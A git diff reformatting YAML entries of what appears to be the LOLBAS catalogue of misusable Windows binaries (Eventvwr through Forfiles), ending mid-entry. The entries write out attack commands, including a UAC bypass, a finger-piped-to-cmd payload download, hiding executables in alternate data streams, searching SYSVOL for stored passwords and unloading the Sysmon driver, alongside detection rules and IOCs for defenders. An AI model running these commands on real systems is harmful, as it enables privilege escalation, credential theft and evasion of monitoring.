+++ b/yml/OSBinaries/Eventvwr.yml @@ -1,34 +1,37 @@ ---- Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. -Author: 'Jacob Gajek' +Author: Jacob Gajek Created: 2018-11-01 Commands: - - Command: eventvwr.exe - Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass - Privileges: User - MitreID: T1548.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: eventvwr.exe + Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command + for the location of mmc.exe, which is used to open the eventvwr.msc saved console + file. If the location of another binary or script is added to this registry value, + it will be executed as a high-integrity process without a UAC prompt being displayed + to the user. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Category: UAC bypass + Privileges: User + MitreID: T1548.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\eventvwr.exe - - Path: C:\Windows\SysWOW64\eventvwr.exe +- Path: C:\Windows\System32\eventvwr.exe +- Path: C:\Windows\SysWOW64\eventvwr.exe Code_Sample: - - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 +- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml - - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml - - IOC: eventvwr.exe launching child process other than mmc.exe - - IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml +- Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml +- IOC: eventvwr.exe launching child process other than mmc.exe +- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command +- Splunk: https://research.splunk.com/endpoint/9cf8fe08-7ad8-11eb-9819-acde48001122/ Resources: - - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 +- Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ +- Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Acknowledgement: - - Person: Matt Nelson - Handle: '@enigma0x3' - - Person: Matt Graeber - Handle: '@mattifestation' ---- +- Person: Matt Nelson + Handle: '@enigma0x3' +- Person: Matt Graeber + Handle: '@mattifestation' diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4c0..75171bf51 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -1,44 +1,42 @@ ---- Name: Expand.exe Description: Binary that expands one or more compressed files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Description: Copies source file to destination. - Usecase: Use to copies the source file to the destination file - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat - Description: Copies source file to destination. - Usecase: Copies files from A to B - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat - Description: Copies source file to destination Alternate Data Stream (ADS) - Usecase: Copies files from A to B - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat + Description: Copies source file to destination. + Usecase: Use to copies the source file to the destination file + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat + Description: Copies source file to destination. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat + Description: Copies source file to destination Alternate Data Stream (ADS) + Usecase: Copies files from A to B + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\Expand.exe - - Path: C:\Windows\SysWOW64\Expand.exe +- Path: C:\Windows\System32\Expand.exe +- Path: C:\Windows\SysWOW64\Expand.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml Resources: - - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 +- Link: https://twitter.com/infosecn1nja/status/986628482858807297 +- Link: https://twitter.com/Oddvarmoe/status/986709068759949319 Acknowledgement: - - Person: Rahmat Nurfauzi - Handle: '@infosecn1nja' - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Rahmat Nurfauzi + Handle: '@infosecn1nja' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d46775..631001ac1 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -1,40 +1,43 @@ ---- Name: Explorer.exe Description: Binary used for managing files and system components within Windows -Author: 'Jai Minton' +Author: Jai Minton Created: 2020-06-24 Commands: - - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe - Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: explorer.exe C:\Windows\System32\notepad.exe - Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe - Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 (Tested) +- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" + Description: Execute calc.exe with the parent process spawning from a new instance + of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking + the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: explorer.exe C:\Windows\System32\notepad.exe + Description: Execute calc.exe with the parent process spawning from a new instance + of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking + the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 (Tested) Full_Path: - - Path: C:\Windows\explorer.exe - - Path: C:\Windows\SysWOW64\explorer.exe +- Path: C:\Windows\explorer.exe +- Path: C:\Windows\SysWOW64\explorer.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml - - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml +- Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command + line is suspicious. Resources: - - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 - - Link: https://twitter.com/bohops/status/1276356245541335048 - - Link: https://twitter.com/bohops/status/986984122563391488 +- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 +- Link: https://twitter.com/bohops/status/1276356245541335048 +- Link: https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - - Person: Jai Minton - Handle: '@CyberRaiju' - - Person: Jimmy - Handle: '@bohops' ---- +- Person: Jai Minton + Handle: '@CyberRaiju' +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 0b6116106..cd15c2f1e 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,27 +1,26 @@ ---- Name: Extexport.exe -Description: -Author: 'Oddvar Moe' +Description: null +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Extexport.exe c:\test foo bar - Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll - Usecase: Execute dll file - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: Extexport.exe c:\test foo bar + Description: Load a DLL located in the c:\test folder with one of the following + names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Program Files\Internet Explorer\Extexport.exe - - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe +- Path: C:\Program Files\Internet Explorer\Extexport.exe +- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - - IOC: Extexport.exe loads dll and is execute from other folder the original path +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml +- IOC: Extexport.exe loads dll and is execute from other folder the original path Resources: - - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ +- Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ Acknowledgement: - - Person: Adam - Handle: '@hexacorn' ---- +- Person: Adam + Handle: '@hexacorn' diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 4682e7cfd..395de8799 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,57 +1,57 @@ ---- Name: Extrac32.exe -Description: -Author: 'Oddvar Moe' +Description: null +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Description: Copy the source file to the destination file and overwrite it. - Usecase: Download file from UNC/WEBDav - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe - Description: Command for copying calc.exe to another folder - Usecase: Copy file - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe + Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of + the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe + Description: Extracts the source CAB file on an unc path into an Alternate Data + Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt + Description: Copy the source file to the destination file and overwrite it. + Usecase: Download file from UNC/WEBDav + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe + Description: Command for copying calc.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\extrac32.exe - - Path: C:\Windows\SysWOW64\extrac32.exe +- Path: C:\Windows\System32\extrac32.exe +- Path: C:\Windows\SysWOW64\extrac32.exe Code_Sample: - - Code: +- Code: null Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml Resources: - - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://twitter.com/egre55/status/985994639202283520 +- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - - Person: egre55 - Handle: '@egre55' - - Person: Oddvar Moe - Handle: '@oddvarmoe' - - Person: Hai Vaknin(Lux - Handle: '@VakninHai' - - Person: Tamir Yehuda - Handle: '@tim8288' ---- +- Person: egre55 + Handle: '@egre55' +- Person: Oddvar Moe + Handle: '@oddvarmoe' +- Person: Hai Vaknin(Lux + Handle: '@VakninHai' +- Person: Tamir Yehuda + Handle: '@tim8288' diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 22fcbb0f9..657946449 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,48 +1,50 @@ ---- Name: Findstr.exe -Description: -Author: 'Oddvar Moe' +Description: null +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. - Usecase: Add a file to an alternate data stream to hide from defensive counter measures - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. - Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: findstr /S /I cpassword \\sysvol\policies\*.xml - Description: Search for stored password in Group Policy files stored on SYSVOL. - Usecase: Find credentials stored in cpassword attrbute - Category: Credentials - Privileges: User - MitreID: T1552.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. - Usecase: Download/Copy file from webdav server - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream to hide from defensive counter measures + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream from a webdav server to hide from + defensive counter measures + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: findstr /S /I cpassword \\sysvol\policies\*.xml + Description: Search for stored password in Group Policy files stored on SYSVOL. + Usecase: Find credentials stored in cpassword attrbute + Category: Credentials + Privileges: User + MitreID: T1552.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is downloaded to the target file. + Usecase: Download/Copy file from webdav server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\findstr.exe - - Path: C:\Windows\SysWOW64\findstr.exe +- Path: C:\Windows\System32\findstr.exe +- Path: C:\Windows\SysWOW64\findstr.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml Resources: - - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d910..f41a753ee 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,31 +1,34 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' ---- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer + that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: +- Command: finger user@example.host.com | more +2 | cmd + Description: Downloads payload from remote Finger server. This example connects + to "example.host.com" asking for user "user"; the result could contain malicious + shellcode which is executed by the cmd process. + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows + Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, + Windows Server 2019, Windows Server 2022 +Full_Path: +- Path: c:\windows\system32\finger.exe +- Path: c:\windows\syswow64\finger.exe +Detection: +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml +- IOC: finger.exe should not be run on a normal workstation. +- IOC: finger.exe connecting to external resources. +Resources: +- Link: https://twitter.com/DissectMalware/status/997340270273409024 +- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: +- Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' +- Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' +- Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5bff..63bb1e56a 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -1,28 +1,26 @@ ---- Name: fltMC.exe Description: Filter Manager Control Program used by Windows -Author: 'John Lambert' +Author: John Lambert Created: '2021-09-18' Commands: - - Command: fltMC.exe unload SysmonDrv - Description: Unloads a driver used by security agents - Usecase: Defense evasion - Category: ADS - Privileges: Admin - MitreID: T1562.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\fltMC.exe +- Path: C:\Windows\System32\fltMC.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml - - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml - - IOC: 4688 events with fltMC.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml +- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml +- IOC: 4688 events with fltMC.exe Resources: - - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon Acknowledgement: - - Person: Carlos Perez - Handle: '@Carlos_Perez' ---- +- Person: Carlos Perez + Handle: '@Carlos_Perez' diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index b8761ad65..53647a1cb 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -1,37 +1,40 @@ ---- Name: Forfiles.exe -Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. -Author: 'Oddvar Moe' +Description: Selects and executes a command on a file or set of files. This command + is useful for batch processing. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. - Usecase: Use forfiles to start a new process to evade defensive counter measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. - Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 + folder. + Usecase: Use forfiles to start a new process to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" + Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match + for notepad.exe in the c:\windows\system32 folder. + Usecase: Use forfiles to start a new process from a binary hidden in an alternate + data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\forfiles.exe - - Path: C:\Windows\SysWOW64\forfiles.exe +- Path: C:\Windows\System32\forfiles.exe +- Path: 